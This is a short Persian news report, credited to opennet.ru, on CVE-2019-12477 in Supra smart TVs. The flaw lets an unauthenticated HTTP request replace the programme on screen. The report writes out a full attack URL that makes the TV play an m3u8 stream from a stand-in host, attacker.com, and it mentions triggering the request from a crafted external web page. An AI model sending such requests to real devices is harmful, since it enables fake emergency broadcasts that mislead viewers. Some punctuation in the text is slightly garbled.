در تلویزیونهای ابری هوشمند سوپرا آسیبپذیری (CVE-2019-12477) که به شما امکان میدهد برنامهای را که در حال حاضر مشاهده میکنید با محتوای مهاجم جایگزین کنید. به عنوان مثال، خروجی یک هشدار ساختگی در مورد یک وضعیت اضطراری نشان داده شده است.
برای حمله، کافی است یک درخواست شبکه ساخته شده مخصوص ارسال کنید که نیازی به احراز هویت ندارد. به طور خاص، میتوانید با مشخص کردن URL فایل m3u8 با پارامترهای ویدیویی، به عنوان مثال «http://192.168.1.155/remote/media_control?action=setUri&uri=» به کنترلکننده «/remote/media_control?action=setUri&uri=» دسترسی پیدا کنید. http://attacker .com/fake_broadcast_message.m3u8."
در بیشتر موارد، دسترسی به آدرس IP تلویزیون محدود به شبکه داخلی است، اما از آنجایی که درخواست از طریق HTTP ارسال می شود، زمانی که کاربر صفحه خارجی طراحی شده ویژه ای را باز می کند، می توان از روش هایی برای دسترسی به منابع داخلی استفاده کرد (به عنوان مثال، در زیر ظاهر درخواست تصویر یا استفاده از ).
منبع: opennet.ru